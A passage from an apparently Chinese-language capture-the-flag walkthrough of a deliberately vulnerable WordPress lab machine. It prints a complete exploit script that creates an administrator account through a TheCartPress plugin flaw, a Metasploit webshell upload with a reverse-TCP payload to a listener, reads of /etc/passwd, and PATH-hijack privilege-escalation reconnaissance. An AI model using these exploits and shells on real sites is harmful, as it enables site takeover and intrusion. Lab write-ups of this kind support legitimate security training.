https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/da1419cc-d821-42d6-b648-bdb3c70d91f2\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/6d80e09d-34d5-4fda-81cb-e703d0e56e4f\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/3615aea0-90aa-4f9a-9792-078a90af7f59\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-39999\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure\n | Fixed in: 6.0.6\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/19380917-4c27-4095-abf1-eba6f913b441\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-5561\n | - https:\/\/wpscan.com\/blog\/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2\/\n | - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data\n | Fixed in: 6.0.7\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/5e9804e5-bbd4-4836-a5f0-b4388cc39225\n | - https:\/\/wordpress.org\/news\/2024\/01\/wordpress-6-4-3-maintenance-and-security-release\/\n |\n | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload\n | Fixed in: 6.0.7\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/a8e12fbe-c70b-4078-9015-cf57a05bdd4a\n | - https:\/\/wordpress.org\/news\/2024\/01\/wordpress-6-4-3-maintenance-and-security-release\/\n |\n | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS\n | Fixed in: 6.0.8\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/1a5c5df1-57ee-4190-a336-b0266962078f\n | - https:\/\/wordpress.org\/news\/2024\/04\/wordpress-6-5-2-maintenance-and-security-release\/\n |\n | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API\n | Fixed in: 6.0.9\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/2c63f136-4c1f-4093-9a8c-5e51f19eae28\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block\n | Fixed in: 6.0.9\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/7c448f6d-4531-4757-bff0-be9e3220bbbb\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block\n | Fixed in: 6.0.9\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/36232787-754a-4234-83d6-6ded5e80251c\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n\n[+] WordPress theme in use: twentytwentyone\n | Location: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/\n | Last Updated: 2024-04-02T00:00:00.000Z\n | Readme: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/readme.txt\n | [!] The version is out of date, the latest version is 2.2\n | Style URL: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/style.css?ver=1.6\n | Style Name: Twenty Twenty-One\n | Style URI: https:\/\/wordpress.org\/themes\/twentytwentyone\/\n | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.6 (80% confidence)\n | Found By: Style (Passive Detection)\n | - http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/style.css?ver=1.6, Match: 'Version: 1.6'\n\n[+] Enumerating All Plugins (via Passive Methods)\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] Plugin(s) Identified:\n\n[+] thecartpress\n | Location: http:\/\/itzhak.perlman.hmv\/wp-content\/plugins\/thecartpress\/\n | Latest Version: 1.5.3.6 (up to date)\n | Last Updated: 2017-01-12T19:25:00.000Z\n |\n | Found By: Urls In Homepage (Passive Detection)\n |\n | [!] 1 vulnerability identified:\n |\n | [!] Title: TheCartPress eCommerce Shopping Cart <= 1.5.3.6 - Unauthenticated Arbitrary Admin Account Creation\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/9b403259-0c84-4566-becd-eb531c486c21\n | - https:\/\/www.exploit-db.com\/exploits\/50378\/\n |\n | Version: 1.5.3.6 (80% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n | - http:\/\/itzhak.perlman.hmv\/wp-content\/plugins\/thecartpress\/readme.txt\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 <====================================================================> (137 \/ 137) 100.00% Time: 00:00:00\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 3\n | Requests Remaining: 19\n\n[+] Finished: Thu Jul 11 03:58:46 2024\n[+] Requests Done: 177\n[+] Cached Requests: 5\n[+] Data Sent: 52.722 KB\n[+] Data Received: 523.41 KB\n[+] Memory used: 272.953 MB\n[+] Elapsed time: 00:00:08<\/code><\/pre>\n\u5c1d\u8bd5\u641c\u7d22\u5229\u7528\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
\n\u7a81\u7136\u51fa\u73b0\u62a5\u9519\u4e86\uff1a<\/p>\n<\/blockquote>\n
<\/div><\/p>\n\u662f\u540e\u53f0\u4e0d\u65ad\u521b\u5efa\u7ebf\u7a0b\u5bfc\u81f4\u7684\uff0c\u5c1d\u8bd5\u91cd\u542f\u5c31\u597d\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ searchsploit -m 50378 \n Exploit: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)\n URL: https:\/\/www.exploit-db.com\/exploits\/50378\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/50378.py\n Codes: N\/A\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/perlman\/50378.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python3 50378.py \nTheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation\nAuthor -> space_hen (www.github.com\/spacehen)\nUsage: python3 exploit.py [target url]\nEx: python3 exploit.py https:\/\/example.com\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python3 50378.py http:\/\/itzhak.perlman.hmv\nTheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation\nAuthor -> space_hen (www.github.com\/spacehen)\nInserting admin...\nSuccess!\nNow login at \/wp-admin\/<\/code><\/pre>\n# Exploit Title: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)\n# Google Dork: inurl:\/wp-content\/plugins\/thecartpress\/\n# Date: 04\/10\/2021\n# Exploit Author: spacehen\n# Vendor Homepage: https:\/\/wordpress.org\/plugin\/thecartpress\n# Version: <= 1.5.3.6\n# Tested on: Ubuntu 20.04.1\n\nimport os.path\nfrom os import path\nimport json\nimport requests;\nimport sys\n\ndef print_banner():\n print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")\n print("Author -> space_hen (www.github.com\/spacehen)")\n\ndef print_usage():\n print("Usage: python3 exploit.py [target url]")\n print("Ex: python3 exploit.py https:\/\/example.com")\n\ndef vuln_check(uri):\n response = requests.get(uri)\n raw = response.text\n if ("User name is required" in raw):\n return True;\n else:\n return False;\n\ndef main():\n\n print_banner()\n if(len(sys.argv) != 2):\n print_usage();\n sys.exit(1);\n\n base = sys.argv[1]\n\n ajax_action = 'tcp_register_and_login_ajax'\n admin = '\/wp-admin\/admin-ajax.php';\n\n uri = base + admin + '?action=' + ajax_action ;\n check = vuln_check(uri);\n\n if(check == False):\n print("(*) Target not vulnerable!");\n sys.exit(1)\n\n data = {\n "tcp_new_user_name" : "admin_02",\n "tcp_new_user_pass" : "admin1234",\n "tcp_repeat_user_pass" : "admin1234",\n "tcp_new_user_email" : "test@test.com",\n "tcp_role" : "administrator"\n }\n print("Inserting admin...");\n response = requests.post(uri, data=data )\n if (response.text == "\\"\\""):\n print("Success!")\n print("Now login at \/wp-admin\/")\n else:\n print(response.text)\n\nmain();<\/code><\/pre>\n<\/div><\/p>\n\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u627e\u4e00\u4e0b\u4e0a\u4f20\u7684\u6f0f\u6d1e\uff1ahttps:\/\/wpscan.com\/vulnerability\/a8e12fbe-c70b-4078-9015-cf57a05bdd4a\/<\/a><\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u4e3a\u5565\u5361\u987f\u81f3\u6781\uff0c\u4f7f\u7528msf\u5b8c\u6210\u8fd9\u4e2a\u64cd\u4f5c\uff1ahttps:\/\/www.hackingarticles.in\/wordpress-reverse-shell\/<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ msfconsole -q \nmsf6 > search wordpress admin shell upload\n\nMatching Modules\n================\n\n # Name Disclosure Date Rank Check Description\n - ---- --------------- ---- ----- -----------\n 0 exploit\/unix\/webapp\/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload\n\nInteract with a module by name or index. For example info 0, use 0 or use exploit\/unix\/webapp\/wp_admin_shell_upload\n\nmsf6 > use 0\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > show options\n\nModule options (exploit\/unix\/webapp\/wp_admin_shell_upload):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n PASSWORD yes The WordPress password to authenticate with\n Proxies no A proxy chain of format type:host:port[,type:host:port][...]\n RHOSTS yes The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n RPORT 80 yes The target port (TCP)\n SSL false no Negotiate SSL\/TLS for outgoing connections\n TARGETURI \/ yes The base path to the wordpress application\n USERNAME yes The WordPress username to authenticate with\n VHOST no HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n LHOST 10.0.2.4 yes The listen address (an interface may be specified)\n LPORT 4444 yes The listen port\n\nExploit target:\n\n Id Name\n -- ----\n 0 WordPress\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set username admin_02\nusername => admin_02\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set password admin1234\npassword => admin1234\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set rhosts itzhak.perlman.hmv\nrhosts => itzhak.perlman.hmv\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set lhost 192.168.0.143\nlhost => 192.168.0.143\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set lport 1234\nlport => 1234\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > exploit\n\n[*] Started reverse TCP handler on 192.168.0.143:1234 \n[*] Authenticating with WordPress using admin_02:admin1234...\n[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress\n[*] Exploit completed, but no session was created.<\/code><\/pre>\n\u4e0d\u884c\u3002\u3002\u3002\u3002\u770b\u4e86\u7fa4\u4e3b\u89c6\u9891\u4ee5\u540e\u53d1\u73b0\u5c06\u90e8\u5206\u8bf7\u6c42\u7ed9\u4ed6\u5c4f\u853d\u6389\uff0c\u7ed9\u4ed6block\u4e00\u4e0b\u5c31\u53ef\u4ee5\u4e86\uff01<\/p>\n
<\/div><\/p>\n\u63a5\u4e0b\u6765\u540c\u7406\uff0c\u6700\u540e\u53ef\u4ee5\u4e0a\u4f20shell\uff01<\/p>\n
<\/div>
\n<\/div><\/p>\n\u597d\u50cf\u5931\u8d25\u4e86\uff0c\u627e\u4e00\u4e0b\uff0c\u6709\u6ca1\u6709\u75d5\u8ff9\uff0c\u5728\u5a92\u4f53\u90e8\u5206\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u8bbf\u95ee\u5c1d\u8bd5\u89e6\u53d1\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u767b\u5f55rita<\/h3>\n(remote) www-data@perlman.hmv:\/$ cd ~\n(remote) www-data@perlman.hmv:\/var\/www$ cd html\n(remote) www-data@perlman.hmv:\/var\/www\/html$ ls -la\ntotal 148\ndrwxr-xr-x 8 www-data www-data 4096 Sep 10 2022 .\ndrwxr-xr-x 4 www-data www-data 4096 Jul 24 2022 ..\ndrwxr-xr-x 8 www-data www-data 4096 Sep 10 2022 .git\n-rw-r--r-- 1 www-data www-data 20454 Jul 23 2022 article-details.html\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 css\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 images\n-rw-r--r-- 1 www-data www-data 47426 Jul 23 2022 index.html\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 js\n-rw-r--r-- 1 www-data www-data 25624 Jul 23 2022 privacy-policy.html\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 removed_backup_2011\n-rw-r--r-- 1 www-data www-data 18494 Jul 23 2022 terms-conditions.html\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 webfonts\n(remote) www-data@perlman.hmv:\/var\/www\/html$ sudo -l \n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@perlman.hmv:\/var\/www\/html$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:106:112::\/var\/spool\/exim4:\/usr\/sbin\/nologin\npostfix:x:109:116::\/var\/spool\/postfix:\/usr\/sbin\/nologin\ndovecot:x:107:114:Dovecot mail server,,,:\/usr\/lib\/dovecot:\/usr\/sbin\/nologin\ndovenull:x:108:115:Dovecot login user,,,:\/nonexistent:\/usr\/sbin\/nologin\nmysql:x:110:118:MySQL Server,,,:\/nonexistent:\/bin\/false\nrita:x:1000:1000:,,,:\/home\/rita:\/bin\/bash\nmilou:x:1001:1001:,,,:\/home\/milou:\/bin\/bash\nze_perlman:x:1002:1002:,,,:\/home\/ze_perlman:\/bin\/bash\n(remote) www-data@perlman.hmv:\/var\/www\/html$ cat \/etc\/passwd | grep '\/bin\/bash' \nroot:x:0:0:root:\/root:\/bin\/bash\nrita:x:1000:1000:,,,:\/home\/rita:\/bin\/bash\nmilou:x:1001:1001:,,,:\/home\/milou:\/bin\/bash\nze_perlman:x:1002:1002:,,,:\/home\/ze_perlman:\/bin\/bash\n(remote) www-data@perlman.hmv:\/var\/www\/html$ su rita -l\nPassword: \nrita@perlman:~$ <\/code><\/pre>\n\u52ab\u6301\u547d\u4ee4\u83b7\u53d6\u79c1\u94a5<\/h3>\nrita@perlman:~$ sudo -l\n[sudo] password for rita: \nSorry, user rita may not run sudo on perlman.\nrita@perlman:~$ ls -la\ntotal 28\ndrwxr-xr-x 5 rita rita 4096 Jul 11 08:43 .\ndrwxr-xr-x 5 root root 4096 Jul 23 2022 ..\nlrwxrwxrwx 1 rita rita 9 Jul 23 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 rita rita 3526 Jul 26 2022 .bashrc\ndrwxr-xr-x 3 rita rita 4096 Jul 26 2022 .local\ndrwx------ 3 rita rita 4096 Jul 11 08:43 mail\n-rw-r--r-- 1 rita rita 808 Sep 11 2022 .profile\ndrwx------ 2 rita rita 4096 Sep 11 2022 .ssh\nrita@perlman:~$ cd mail\nrita@perlman:~\/mail$ ls -la\ntotal 12\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .\ndrwxr-xr-x 5 rita rita 4096 Jul 11 08:43 ..\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .imap\nrita@perlman:~\/mail$ cd .imap\/\nrita@perlman:~\/mail\/.imap$ ls -la\ntotal 20\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .\ndrwx------ 3 rita rita 4096 Jul 11 08:43 ..\n-rw------- 1 rita rita 452 Jul 11 08:43 dovecot.list.index.log\n-rw------- 1 rita rita 8 Jul 11 08:43 dovecot-uidvalidity\n-r--r--r-- 1 rita rita 0 Jul 11 08:43 dovecot-uidvalidity.668f7f1f\ndrwx------ 2 rita rita 4096 Jul 11 09:00 INBOX\nrita@perlman:~\/mail\/.imap$ cd INBOX\/\nrita@perlman:~\/mail\/.imap\/INBOX$ ls -la\ntotal 16\ndrwx------ 2 rita rita 4096 Jul 11 09:00 .\ndrwx------ 3 rita rita 4096 Jul 11 08:43 ..\n-rw------- 1 rita rita 388 Jul 11 09:00 dovecot.index.cache\n-rw------- 1 rita rita 660 Jul 11 09:02 dovecot.index.log\nrita@perlman:~\/mail\/.imap\/INBOX$ cat dovecot.index.log \nhdr-pop3-uidl\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd >\ufffd\ufffd\ud04ff\ufffd(\ufffd\ufffdf\ufffd\ufffd.\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffd\nheader-md5\ufffd\ufffd\ufffd\ufffduY^\ufffd\u05c6\ufffdZ\ufffd\ufffdQ!#>!\ufffd\ufffd\ufffd\ufffd 0T$`\ufffdf\ufffd\ufffd\ufffd\ufffd \ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffdcache\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdf\ufffd\ufffd\ufffd8\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffdf\ufffd\ufffd\ufffd\ufffdp\ufffd\ufffd\ufffd<\/code><\/pre>\n\u6ca1\u53d1\u73b0\u5565\u7ee7\u7eed\u641c\u96c6\uff1a<\/p>\n
rita@perlman:~\/mail\/.imap\/INBOX$ cd ~\nrita@perlman:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/pkexec\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/news\/bin\/innbind\n\/usr\/lib\/news\/bin\/rnews\n\/usr\/libexec\/polkit-agent-helper-1\nrita@perlman:~$ file \/usr\/lib\/news\/bin\/innbind\n\/usr\/lib\/news\/bin\/innbind: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=e6511c2a7e6fecb7203c28170ce4d10b91ba7565, for GNU\/Linux 3.2.0, stripped\nrita@perlman:~$ file \/usr\/lib\/news\/bin\/rnews\n\/usr\/lib\/news\/bin\/rnews: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=a70350be5f5be2d0864083120b169305c76ae0da, for GNU\/Linux 3.2.0, stripped\nrita@perlman:~$ ls -la \/usr\/lib\/news\/bin\/rnews\n-rwsr-xr-- 1 news uucp 26896 Feb 16 2021 \/usr\/lib\/news\/bin\/rnews\nrita@perlman:~$ echo $SHELL\n\/bin\/bash\nrita@perlman:~$ cat \/etc\/group | grep uucp\nuucp:x:10:\nrita@perlman:~$ ls -la \/usr\/lib\/news\/bin\/innbind\n-rwsr-xr-- 1 root news 14480 Feb 16 2021 \/usr\/lib\/news\/bin\/innbind\nrita@perlman:~$ cat \/etc\/group | grep news\nnews:x:9:\nrita@perlman:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\n\u7ee7\u7eed\uff01\u4e0a\u4f20 pspy64\uff1a<\/p>\n
(remote) rita@perlman.hmv:\/tmp$ chmod +x pspy64 \n(remote) rita@perlman.hmv:\/tmp$ .\/pspy64 \nSegmentation fault<\/code><\/pre>\n\u3002\u3002\u3002\u3002\u3002\u3002\u3002\u670d\u4e86\u3002\u3002\u3002<\/p>\n
(remote) rita@perlman.hmv:\/tmp$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\n(remote) rita@perlman.hmv:\/tmp$ cd \/home\n(remote) rita@perlman.hmv:\/home$ ls -la\ntotal 20\ndrwxr-xr-x 5 root root 4096 Jul 23 2022 .\ndrwxr-xr-x 18 root root 4096 Sep 10 2022 ..\ndrwxr-xr-x 4 milou milou 4096 Sep 11 2022 milou\ndrwxr-xr-x 5 rita rita 4096 Jul 11 08:43 rita\ndrwxr-xr-x 4 ze_perlman ze_perlman 4096 Sep 11 2022 ze_perlman\n(remote) rita@perlman.hmv:\/home$ cd milou\/\n(remote) rita@perlman.hmv:\/home\/milou$ ls -la\ntotal 32\ndrwxr-xr-x 4 milou milou 4096 Sep 11 2022 .\ndrwxr-xr-x 5 root root 4096 Jul 23 2022 ..\nlrwxrwxrwx 1 root root 9 Jul 26 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 milou milou 220 Jul 26 2022 .bash_logout\n-rw-r--r-- 1 milou milou 3528 Jul 26 2022 .bashrc\n-rwxr-xr-x 1 milou milou 152 Sep 11 2022 clean.sh\ndrwxr-xr-x 3 milou milou 4096 Jul 26 2022 .local\n-rw-r--r-- 1 milou milou 883 Jul 27 2022 .profile\ndrwx------ 2 milou milou 4096 Sep 11 2022 .ssh\n(remote) rita@perlman.hmv:\/home\/milou$ cat clean.sh \n#! \/bin\/bash\n\next=(save bak bif old bck bkz sqb bak2)\n\nfor x in ${ext[@]}\ndo\ncd \/tmp && find . -type f -user $(whoami) -name "*.$x" -exec rm {} +\ndone<\/code><\/pre>\n\u627e\u5230\u4e86\u4e00\u4e2a\u5947\u602a\u7684\u811a\u672c\u770b\u4e0a\u53bb\u662f\u5b9a\u65f6\u4efb\u52a1\uff0c\u60f3\u529e\u6cd5\u8fd8\u662f\u5f97\u7528pspy64\uff0c\u4f7f\u7528ssh\u79c1\u94a5\u767b\u5f55\u518d\u4f7f\u7528wget\u4e0a\u4f20\u5c31\u80fd\u4f7f\u7528\u4e86\u3002\u3002\u3002\u3002\u3002pwncat-cs\u7684\u96f7\u70b9\uff1f\uff1f\uff1f<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u6267\u884c\u4e86 root \u7684\u4e00\u4e2a\u5b9a\u65f6\u811a\u672c\u4ee5\u53ca \u521a\u521a\u627e\u5230\u7684\u90a3\u4e2a\u5b9a\u65f6\u811a\u672c\uff0c\u800c\u4e14\u52a0\u8f7d\u4e86\u4e2a\u4eba\u8bbe\u7f6e\uff1a<\/p>\n
rita@perlman:\/tmp$ cat \/home\/milou\/.profile \n# ~\/.profile: executed by the command interpreter for login shells.\n# This file is not read by bash(1), if ~\/.bash_profile or ~\/.bash_login\n# exists.\n# see \/usr\/share\/doc\/bash\/examples\/startup-files for examples.\n# the files are located in the bash-doc package.\n\n# the default umask is set in \/etc\/profile; for setting the umask\n# for ssh logins, install and configure the libpam-umask package.\n#umask 022\n\n# if running bash\nif [ -n "$BASH_VERSION" ]; then\n # include .bashrc if it exists\n if [ -f "$HOME\/.bashrc" ]; then\n . "$HOME\/.bashrc"\n fi\nfi\n\n# set PATH so it includes user's private bin if it exists\nif [ -d "$HOME\/bin" ] ; then\n PATH="$HOME\/bin:$PATH"\nfi\n\n# set PATH so it includes user's private bin if it exists\nif [ -d "$HOME\/.local\/bin" ] ; then\n PATH="$HOME\/.local\/bin:$PATH"\nfi\n\nexport PATH=.:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games<\/code><\/pre>\n\u56e0\u4e3a\u8def\u5f84\u4f18\u5148\u7ea7\u662f\u5f53\u524d\u76ee\u5f55\u6240\u4ee5\uff1a<\/p>\n
